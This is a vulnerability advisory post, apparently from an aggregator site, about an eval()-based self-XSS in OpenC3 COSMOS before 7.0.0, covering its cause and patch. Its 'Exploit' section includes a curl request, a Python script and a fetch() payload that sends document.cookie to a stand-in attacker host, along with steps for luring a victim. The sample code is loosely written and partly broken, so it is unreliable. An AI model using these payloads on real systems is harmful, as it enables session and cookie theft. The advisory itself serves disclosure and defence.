OpenC3 COSMOS, Self-XSS, GHSA-ffq5-qpvf-xq7x (Medium)

Listen to this Post

The `convertToValue` method in `CommandSender.vue` of OpenC3 COSMOS versions prior to 7.0.0 unsafely passes user-supplied array strings to JavaScript’s `eval()` function. This occurs when the UI processes a command parameter flagged as an array. The affected code block does not sanitize input; it directly evaluates the string content. An attacker can craft a payload disguised as a legitimate array parameter, such as [alert(document.cookie)], and inject it via the Command Sender dropdown. Because the payload is placed inside square brackets, the interface treats it as a valid array. When the victim selects a command supporting array parameters and clicks “Send”, the `eval()` function executes the malicious JavaScript in the browser context of the authenticated session. This self-XSS attack requires user interaction—typically tricking a victim into pasting the crafted payload through a phishing message. Successful execution grants the attacker the same privileges as the victim, including access to local storage, session tokens, and the ability to perform authenticated actions. The root cause is improper neutralization of dynamically evaluated code (CWE-95). The official patch replaces the dangerous `eval()` call with JSON.parse(), which safely parses valid JSON without executing arbitrary code. This fix is included in version 7.0.0 and later.
Platform: OpenC3 COSMOS
Version: < 7.0.0
Vulnerability: Self-XSS via eval()
Severity: Medium (CVSS 4.6)
date: 2026-04-20

Prediction: 2026-04-20 (v7.0.0)

What Undercode Say:

Simulate a malicious payload injection using curl
curl -X POST "http://target-cosmos.com/api/command/send" \
-H "Content-Type: application/json" \
-d '{"command": "INST ARYCMD", "parameters": "[\"alert(document.cookie)\"]"}'
Python script to exploit the eval injection
import requests
payload = "[alert('XSS')]"
url = "http://target-cosmos.com/command/send"
data = {"cmd": "INST ARYCMD", "params": payload}
requests.post(url, json=data) Sends crafted array

Exploit:

  1. Identify a command in the dropdown that accepts array parameters.
  2. Craft a payload inside square brackets, e.g., `[alert(‘XSS’)]` or [fetch('http://attacker/steal?c='+document.cookie)].
  3. Lure a logged-in user to paste the payload into the parameter field via social engineering.
  4. When the user clicks the “Send” button, the code executes in their browser.

Protection from this CVE:

  • Immediately upgrade to OpenC3 COSMOS version 7.0.0 or later.
  • If upgrading is not possible, manually replace the `eval()` call with `JSON.parse()` in CommandSender.vue.
  • Implement a Content Security Policy (CSP) that blocks `’unsafe-eval’` and restricts script sources.
  • Apply strict input validation to reject any JavaScript code within array parameters.

Impact:

  • Local JavaScript execution in the victim’s browser.
  • Theft of session tokens, cookies, and other data stored in local storage.
  • Unauthorized actions performed within the context of the authenticated user.
  • Complete compromise of the user’s interaction with the affected application.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top